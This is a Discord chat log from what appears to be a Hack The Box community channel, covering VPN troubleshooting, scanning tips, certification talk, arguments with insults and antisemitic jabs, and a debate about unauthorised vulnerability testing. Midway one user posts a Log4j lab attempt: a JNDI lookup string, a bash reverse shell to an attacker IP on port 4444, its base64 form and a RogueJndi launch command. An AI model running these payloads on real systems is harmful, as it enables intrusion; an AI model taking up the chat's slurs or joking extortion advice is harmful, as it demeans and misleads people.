#general
1 messages Β· Page 613 of 1
it is a cmd not an app
sudo openvpn /path
sudo openvpn /mnt/c/Users/xxxx/Downloads/vpnnamefile.ovpn
how do I check if I am connected tho?
ifconfig and same ip
ping the htb machine
what do you see on the open vpn kali windows? where you connected the vpn?
2026-04-05 12:22:22 OPTIONS IMPORT: tun-mtu set to 1500
2026-04-05 12:22:22 Preserving previous TUN/TAP instance: tun0
2026-04-05 12:22:22 Initialization Sequence Completed
2026-04-05 12:22:22 Data Channel: cipher 'AES-256-CBC', auth 'SHA256', peer-id: 31, compression: 'lzo'
2026-04-05 12:22:22 Timers: ping 10, ping-restart 120
2026-04-05 12:22:22 Protocol options: explicit-exit-notify 1, protocol-flags cc-exit tls-ekm dyn-tls-crypt
the command I ran was sudo openvpn then machine eu ip
send me the path here please
hmm
with kali you need mnt
most surley you entered the path wrong. I did that too
send the path here please
ok
ifconfig | grep "10"
and what does this do?
@swift canyon What VPN do you have downloaded and what lab are you trying to access?
Runs if config then grabs everything with 10 from the command output
Finall a nice machine for it
just a random ctf
trying to connect first
You don't need an HTB VPN for challenges but for all other labs you need the appropriate VPN
send the path here man. I will send you something
its just /desktop
right click copy path. because desktop is in users in c
aa
Also you can't run HTB VPNs in the pwn box and don't need to run them on the pwn box to access stuff.
ahh I see
Im a bit lost on what to do then
You also don't need to run nmap or ping on challenges
Once the challenge has spawned you should be able to access it
'/home/kali/Desktop/machines_eu-2.ovpn'
sudo openvpn /mnt/home/kali/Desktop/machines_eu-2.ovpn
sudo ip route flush cache
sudo killall openvpn
first go with the kill and flush
is it showing you 2026-04-05 12:47:54 Initialization Sequence Completed
Get briefed on how challenges work and how to play them!
who cares
We
Options error: In [CMD-LINE]:1: Error opening configuration file: /mnt/home/kali/Desktop/machines_eu-2.ovpn
Use --help for more information.
without mnt
same
Options error: In [CMD-LINE]:1: Error opening configuration file: home/kali/Desktop/machines_eu-2.ovpn
Use --help for more information.
Do u use WSL or VM?
What is bro doing?
Your path is wrong
I am on avm
But this is general, go to #1024429874246590575
How is u Ceald
I didnβt spoke to you
I will just ignore you and thatβs it for me
Oh?
work bro
Did u mean me
I meant @terse dirge

But how r u
11.11 anyone superstitious abt the number?
functioning?
can u give them
?
like what is this sh
no, u have to rank up
Or buy VIP+
i think
I saw a noob rank post an embed
Just pay to win like i did
I have a question about machine called facts in the seasons box
I got access to root and found the user flag with the root flag and when i submitted them they are wrong
better luck there
Thank u
i actually dont care, you all are still beautiful
I do
ok bye thank you for ur obsevartion
Can someone ask stupid question to fuel the chat
how are you
Oh i see i already ask haha
You are beautiful too and very special β€οΈ
Does metroid shoot from a gun on his arm, or in his hand?
Change the world
My final message
who got stuck on garfield?
rat please π
Why are you not the moderator
I left lol
But why π
Traumatic brain injury
Damn I'm sorry didn't know
No, it's fine. No damage. Not only treatable, but curable. I am doing well, and back to my shitposting
Nice
But I'd have to climb back up to moderator again
hi
Oh
And honestly, I don't want to lol
You can just go snag community contributor, do well, and move up to mod
||how could u say no to the power||
wait rat u were a mod before?
u cannot, I will be immune
I can't be as active as I was before
Though, mods are pretty sparse these days lol
on the
hacktheboxserver
π
this ain that serious
For a long time lol
long long time ago
...
their was a modrator
in the hackthebox server
π₯
I used to basically live in the CPTS channel
This is true
I used to live in you
π³οΈβπ
long long ago 0daykitty
used to live
in vader
π₯
π
I am straight
Btw @west venture , vader is a girl
respect
then he dont deserve vader in da name
She can use any name she wants
Why are you telling me this?

some resistence did not stop anyone if u ask me
It was more of a joke than anything
Cuz we both know it's not an appropriate joke to tell a female
πΏ
Sorry about that
So who got blocked?
me
I was saying that to rat
The dumbass transphobe who kept trying to reply to me
well well well
i am not scared
i am discusted
????????????????????????????/
I had like zero context i just come here say some shit and leave
<@&861185840277487616>
huh ?
I don't think this is a real word
yeah
They deleted another message. Check the logs and escort them out
Who said what?
and a houthi
Lol
ok
My first time pinging serous rule break
Keep yapping bro
speach
jews
alr jew
Yeah this server is not ruled by a democratic system
he did n othing wrong debate me in dm
So shut up
didnt take long for the moron thoughts to come out
jewish*
alr
Ph we have so many good things to do rather than debate kids like u bro
im older than u jew
i am interested in buying the hackthebox platform/website.
my offer is 500euro and i can pay it in 10months every month 50euro
i want to be the owner of the website
So?
I did not call u a kid bcz of ur age
Bro server the left
Lol
is it possibru ?
No shut up
ok
You're stupid
Either way after an hour he would have met the same fate
Chill candy
@west venture nobody asked ur opinion
I know it's a joke and it was good
I can state my opinion which is you're stupid
Yo chill
Don't start an argument now
Waot
Wait
scoot
And my opinion is a fact
Bye
@west venture sup internet gangster
Have fun arguing
do it carefully @bronze lion
you are missing the action
Action is over now
keyboard warriorsz
Not if he says something more
im getting the feeling he will
Uhh
I'd like to say that egg came first and then chicken
Okay?
Roger that cap
Know your fucking place trash
Yes the egg came first
What's the real 0day?
stop pulling his legs
@ornate ibex if he calls me stupid i can call him stupid
I called you stupid because you ARE stupid
bruh stop the crap

@west venture where does the egg come from stupid
respond
The chicken
u stupid
We really gonna have another crash out
and I think I started it π’
Okay noob rank
@west venture do i look like i care about rank ?
No bc you're too dumb to actually do it
I'll assume both of you are messing around. When you both start to hurt each other plz walk away like a gentlemen
Also discord has a reply feature
@west venture u don't even know what my main account is stupid
You don't have to ping my name every time you reply
lmao the real let the men fight
@west venture
^ proof of stupidity
@west venture
@west venture ban me kick me perm ban me
Okay
Impersonating staff is actually against the rules
Oh
Well if he's not stupid, he'd know a moderator has a green shield
@west venture better delete it cuz u are scared to get caught and then u'll cry in a corner
@west venture do i also need to put a profile picture ?
Final warning before I timeout both of u.
Final warning before i timeout all of u.
Don't do it
im gonna go do some biceps exercises ciaoo
good
@west venture stupid
^timeout
u shud have done the bicep workout.
Is the streak system bugged? Says im 30/0 points and the little fire icon isn't lit up
reach out to the support
Where did you leave it last?
In the website
every sunday the same. it resets on monday, the visual bug is there since years
Oh gotcha thanks. I guess I never looked on sunday.
oh tejas took care of it
There were two
The Web Penetration Tester Job Role Path is for individuals who want to enter the world of web penetration testing with little to no prior experience in it. This path covers core web security assessment and web penetration testing concepts, and provides a deep understanding of the attack tactics used during web penetration testing. Armed with th...
Completed path. Finally!
CONGRAAATTSSSS
Thanks π
deserved
Wen test? Today?
when?
pffft.....
Before 30 June.
lets lock on 29 june?
No, get certified before 30 June.
Or ban
golam, where is your certs
so, I shud attend more than 2 weeks
I have a deal with Ryan for Q2.
Golam is pretending to be technically unskilled
π°
i have 4 more months for this years cert
This.
tejas you have to start at june 1
or u might be late
so?
speaking of i will finish the path today or tomrrow
There's actually fifteen public holidays in June
Which path
Same one?
Get you exam done before tejas or ban
gotta refactor the notes
The pact has been made
lets do whoever gets most flags
gets not banned
Thank you. I was tryna figure that complex math 
No, who is first
You have to be better than Tejas, you are the chosen one
ok so
i have to get cwes in 3 months
i have to either get equal or more flags than tejas
if not i get banned
deal?
im putting a bet on kalshi golem vs tejas
πΈ
get ur bets in
i think banned is too soft
Ritualistic scaphism
good ideas
The very same
Yep I vote for that one
me too
I'll have to practice a lot, I feel. Hopefully, I make it in the first attempt.
good luck
Thanks
arnt there writeups?
if not i can just send you mine
actually mine arrnt good for learning
send me the flags thnx
ukw? @sturdy thistle is clever enough that he'll spot that u cheated. and ban u

and also me
jk lmfao
dm me
Good morning
i am not used to discord
Hallo, the starting point has uhh
and used youtbe
Just encrypt them first with rot26
rot0 more efficient
as said in writeup
So I'd like to pause for a moment
Encryption and encoding are two different things
Big important
oh i'll try with rot13 now
Base64 is an encoding, not an encryption. It's like speaking another language you can undo it
lol i was thinking the same but he helping

You can also undo encryption
What form of transformation or representation of data CANNOT you undo?
but the official writeup doesn't mention use of rot13
Yup
Hashing
Yay I know things look at me go
my brother then what should i do
Hammer smash
Burning
Pulping
Gibe me uno moment
But can you see why kids love cinnamon toast crunch
I'm reading the writeup
Nuclear bomb
What is your issue exactly?
tier 2 unified starting point
use burp
i uploaded the payload using burpsuit
and u got what
We can ban him before taking exam
and also got the Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
but it is not connecting to nc
Can you copy paste me your payload before you base64 encode it friend?
It's your subnet ip
its not ur public ip lol
Maybe he's using his real IP
Its not unsafe to share private IP addresses lol
Not really dangerous
I'm trying to make sure you wrote your own IP and not the one from the writeup
Lol
oh i lied u do get a shell in this
HTB doesn't have forwarding between the VPN clients right?
this is from my writeup
${jndi:ldap://{ tun0 }:1389/o=tomcat}
Like if I am connected to the same subnet as you, can I ping you?
this is what exactly my screen looks like but i am not connecting to nc
Wait are you trying to exploit the Log4j vulnerability?
Cyberchef mentioned
It starts with log4j yeah
echo 'bash -c bash -i >&/dev/tcp/10.10.15.245/4444 0>&1' |
base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMjQ1LzQ0NDQgMD4mMQo=
i did it in terminal
just copy pasted what writeup said ( Trust me i did not wanted to cheat
writeups arent cheating if ur learning
It's starting point - no worries
Wait if my understanding about the whole log4j thing is correct, should you not host a malicious java Library on your ldap server??
Idk
Without a bash reverse shell
i have
Oh I think I see your issue sir
rohue jndi
the rogue-jndi runs both an ldap and http server. both malicious
yeah it's not bash I think
You gotta create the reverse shell inside the java Library
That command
Is designed to spit out the base64 encoded command
In the terminal
That's why it echos
ββ[eu-starting-point-2-dhcp]β[10.10.15.245]β[htb-mp-2518939@htb-kzu8rdkw10-htb-cloud-com]β[~/rogue-jndi]
ββββΌ [β
]$ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMjQ1LzQ0NDQgMD4mMQo=|{base64,-d}|{bash,-i}" --hostname "10.10.15.245"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.15.245:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.15.245:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.15.245:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.15.245:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10.10.15.245:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.15.245:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://10.10.15.245:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.15.245:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
See what I mean?
can you try doing it in Burp. I remember being stuck here as well because I was doing it with Curl
Oh starting point has you go that far? I would have expected it to be the easiest possible stuff
Starting point has updated a time or two since I've done it
I would think like some boot to root stuff, or suid stuff
DM me
I'm not doing this, the writeup is
And yes, it's a command intended to show the payload being base64 encoded
how to dm
Yeah so you need to have your bash reverse shell be executed by the java class file
can anobody help with the Kobold machine. Been stuck at PrivEsc since yesterday.
i have sent the screenshot the gentleman who asked me to DM
Nice nice
This is kinda par for general. Maybe #starting-point . Not sure if there is image perms there
All good. seems jokes only apply for some.
nobody answers there. full of ghosts
Not really I was just asking that we not troll the fella getting help on something he stuck with
Other than that it's back to our regularly scheduled clown posting

I fixed my vps
I'm very happy about it
How are you cloud
I'm good!
My diet has been helping me a lot
Significantly less misery in my life
Today's always good
It's the worst day to be homeless. Everything is closed lol
I could potentially relocate, but not until my medical situation is done.
But I'm in a good spot to shiny up the resume first. I think I'll finish maldev academy, and grab both CRTO I and II
I think I can knock it all out in 5 months
I was looking at OSEP and OSED, but between the price and the stuff I didn't want to do, neither fit right
I really need CS experience, so I want that CRTO
OSED looked interesting, but i feel like my maldev academy already goes beyond the stuff I'd like from it, and I'm not all that interested in the binary exploitation
How far are you in osep?
It still 24 hours?
Ah
go for it
Does it not have much web?
The new cert
this one π
I was looking at the CRTO exam structure, and was sad that there is no report portion. After the beast that was the CPTS report, I felt ready for anything, and there's just nothing.
Nope. You get scored on two things - flags and opsec
Alerts hurt your score
You can also pause your exam time
I think the first exam is basic AV evasion
Second one is more advanced
But you have to use cobalt strike, which they give you during it
Please
It's like the only way to get cobalt strike experience without working somewhere that has it first lol
fitgirlcobaltstrike
I'm building my project for havoc
I don't like it either lol
Because sliver is filthy go

Happy good morning
I'm so happy today that I woke up
I could have just as easily not woken up
Another beautiful day in the life
I must go poo now
I wish to never waken up
Wish granted. You can never sleep again
I wish to become unconscious, completely bypassing sleep
if there is no physical health toll to that wish i want it too
i could accomplish so much more if i never needed to sleep
They monkeys paw has no mercy

yes, but you could just always stay up as long as you possibly can and then go to sleep when you physically can't study anymore/do what you wanted to accomplish
Wish granted. You're now eternally dreaming what you would have lived anyway.
good sleep affects memory
realistically it's probably going to have an effect on you possibly dying earlier, but none of us know when that is going to happen
If you stay awake for long you will die
Typically within a month
how long are we talking? -- i'm guessing you meant staying awake for a month, probably yeah
I don't think anyone has gone without sleep for more than like 10 days
Some might say that sleep is the most important hacker skill
they know what they talking about
Others argue pizza
My mom is googling the 67 meme

Dear god
el cringo
did you initiate her googling by doing it?
This is a fair question
No
good. i was about to say I hope the answer is no π
Six seven!
Hi im kevin
almost heaven. west virginia, blue right mountain!
bruh
Braaaaaah u broke it
salut la monde
La fishe la chocolat
les baguette
Uvevweve
does any kind sould have eyewitness installed
Ive it installed
i do
Lemme recall
i think it was just on kali
Ive it on kubuntu
lmao rip
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. - RedSiege/EyeWitness
installation in readme
That's the one that takes screenshots of everything, right?
yeah
Im using an alias pointing to Eyewintness.py
i am 90% sure this will be useless in the exam but i am gatekept on the module question
I had issues as well, if I remember. I think it also only works with chrome?
Yes
yeah but i gotta install it first
Theres Aquatone too
use gowitness instead https://github.com/sensepost/gowitness
I hated it, and skipped
Ive had both give different results though
imagine using chromium based browsers
well i am gonna read the source code to find out
modern problems need modern solutions
I get why you would use something like that in real life, but I'd rather manually do it unless it's a whole lot
Aquatone has a fixed one
ye that one worked
Maybe the opposite
Ah yes the module thing
Fbi open up
"whats wrong"
-WHATS WRONG ?
"shows discord chat"
-THIS IS FNG WRONG
Cant believe how bad the new UI is for academy
U cant even start a new section in a new tab
But if you never take time, how can you have time?
I aquire more time by wasting others' people time so i win
Is there a problem login the website?
both works for me
π
wtf
i thought it was a joke
i submitted user flag now in root and it was accepted
β οΈ
Congratulations
i have to login in a incognito window because no matter what i do doesnt work xD
browser magic
someone else was asking about the PJQ180 error earlier
that was me
any1 knows why it doesnt let me scan a target machine ip on a starting point
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
I can ping the ip
but cant scan it
Cmd?
What exact command are you running to scan?
nmap -sV
bro what
thats the command
lmao
So that's not sufficient
good luck
You need to target the IP in an Nmap scan.
nmap -sV <ip>
yea
Gotcha, so nmap does take a while it's not instant
And it takes some time
Not too long tho
yeah but it says 0%
imma wait a bit ig
Click any button, it will give update on how much is completed
Dont click the power button tho
yeah I usually do up arrow key
but it stays at 0%
i feel like thats not efficient anyways
If you still have trouble, add -v or -vv (double verbose) to troubleshoot
find open ports before u run version or scripts against it. if its probing version for every port its gonna be slower
Or do without any flags first
Yeah that too
or use rustscan bc rustscan is goated
rustscan -a {ip} --ulimit 5000 -b 500 -- -A -Pn
Nmap scan report for 19.129.71.180
Host is up (0.00071s latency).
All 1000 scanned ports on 19.129.71.180 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
I usually go with
sudo nmap -sC -sV -vv IP
Never really had to wait for more than a min
Don't use rustscan yet, learn the nmap properly first
thats with the normal scan
actually true, just do nmap module
@eager sedge Issue resolved with Kali. Thanks!
just nmap then ip
I can hear ippsec speaking this command in my head
Do this
sudo nmap -p- IP --min-rate=10000 (not a good command to use but quick check of all port)
Yep hehe
this gives things like the ttl

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.10 seconds

Either reach out to support or ask in #1024429874246590575
told it before this is general


Are you connecting to the same vpn as the machine
I just think that 1 machine was broken tbh
yeah everything was good
works fine on another machine
yo are instances spawning for u?
I got lamb shank and rice and garlic sauce
Thoughts on using arch linux for cybersecurity anyone?
πππ
Kali already comes with it
I use parrot as of now
I don't want to have to do a lot of work on a distro/OS setup
I need something that alrady have all
minimal configs on my part
Although i did try to set up blackarch but a lot of tools having trouble ti be installed
minimal work on my part
So parrot and kali does the work u say
Yes
Is blackarch even still maintained
No idea
Didnt check that one
But it did install a fair amount of tools
Good question
I think the repository is mostly maintained , as for the ISO im not sure
Itβs good as bootable distro but there are permanent install options as well
certainly me experimenting with distros
Hannah Montana Linux
i heard that one
Which is perfectly usable
Hellooo
The biggest misunderstanding begginers get Is thinking Linux distros are different operating systems
i tried reporting a vuln through responsible disclosure and i got shot down??
what would you do if you found a bug in a major restaurant POS app ?
lmao
i mean you couldnβt really make money off it,just cause the restaurant losses
Use it as leverage to extort money
Was the restaurant participating in a bug bounty program
nah
So what you did is called a crime
π
yikes
i didnt exploit it
Still
You don't have to, for it to be a crime
big yikes
"i had the bank owner with me when i robbed the bank"
Cool motive. Still crime.
IM SORRY
Use a proper bug bounty or vdp
Or don't complain when you get shot down, or wind up in federal prison
they dont have a vdp
Well the least you can do now is double down and threaten to cause massive losses to the restaurant unless they pay you a monthly fee....
Yk what they say
If you commit a crime, go all the way
im genuinely confused as to what youre supposed to do if they dont have a VDP
You do not test them
That's this thing called illegal
ok let me give you more context
I'm good. Discussing this is against the rules
Mods should already boot you lol
Well since the owner ignored you, you definitely did earn the rights to go and call him stupid to his face
But I truly don't understand the mindset of people completey shooting down these.
No hospital?
People probably assume it's a scam
Like why get mad and be all egoistic and not care about it, and risk someone actually exploiting the vulnerability next time
thats what i was thinking
i got a call from their security team and she sounded annoyed
anyways what kinda hacking are you into?
Better hope they don't press charges
they didnβt
or theyβre using paper mail
usually its either paper mail or they randomly show up to collect you
Well boxes are mostly web hacking and privilege escalation, and apart from that, I like to mess around with game anticheats, bypass them, hack IOT stuff etc
cool
youre not into bounties?
Stay safe and follow the law next time, I understand you had good intentions but you always need explicit permission and to verify it ,if theres a bug bounty read policy and scope that's a safe bet
Sometimes
you can be motived to do the right thing but still fuck up. Thats why its strongly encouraged to get a better foundation before trying stuff in the real world, especially since its an extremely thin line between legitimate work and jail time in this field
yeah imma do that next time
what do you do for work?
what kinda hacking are you into?
also depending on your jurisdiction, safe harbor laws might be protecting you, in which case youre actually fine but I wouldnt risk it in the future

I work in IT
tell me more about it
I jump around but lately Ive been diving more into vulnerability research, finding bugs
I'd rather not lol. It's quite complicated and embarrassing
damnn ,whats some creative bugs youve found or heard of?
can i guess?
Realistically, you won't go to prison for these bc nobody has the necessary tech, effort or money to track down a person solely bc they messed around with a webpage.
Unless you go to them and tell them of course
that also
Okay
is the place you work at embarrassing?
No
the job role?
Thats the complicated part. I do everything
Lol
do you own the place you work at?
No it's a factory
rando question, did they do an overhaul on the streak system ?
oh
yeah i got it
Looks like they did an overhaul on a lot of things
phallus shaped objects factory?
i know been digging through some of it. but i just noticed reading padges and anwsering question do not provide you with point anymore
No it produces tea
ya lost me
Loll
can you elaborate on that lol for me. i like to know how to keep my streak alive
Always been this way. You get 20% of your cubes back when you finish it. How the cubes are distributed is different across all modules. Some only give them back for the final skill assessment, etc.
you got advice for someone trying to get into cybersecurity or bug bounties?
sorry seems there is a little confusion. i am not refuring to cubes i am talking about the motivation streak system
Idk I guess keep learning? I am the one who needs advice lol.
But yeah, keep learning
Do the boring stuff, they are needed
that earns you badges
like what? theory?
Mostly, people love to skip over text, or some fundementals or basics but later you will think back at that moment
I named my wifi hotspot North korean spying surveillence
Stick to bug bounty programs, or vdp if you just want cred
well idk i get lost looking at a real target
like i dont know where to look
Practice makes perfect, dive deep into subjects, return back, fail, learn about vulns, fail, etc etc
picking a particular endpoint is coool but i wish i knew what to probe into just by looking at it
Then you need to learn, instead of jumping ahead. Use the academy
There is always so much to learn
If you want to do bugbounty
Pick a vuln you want to learn, don't try to master them all at once
I've been there, doing a little bit of idor, little bit of xss, little bit of sqli etc etc will make you learn nothing
whats like a bounty youre proud of?
None sadly enough, I'm not a star with bounties
Totally different methodology etc then what I'm used to
what do you do for work?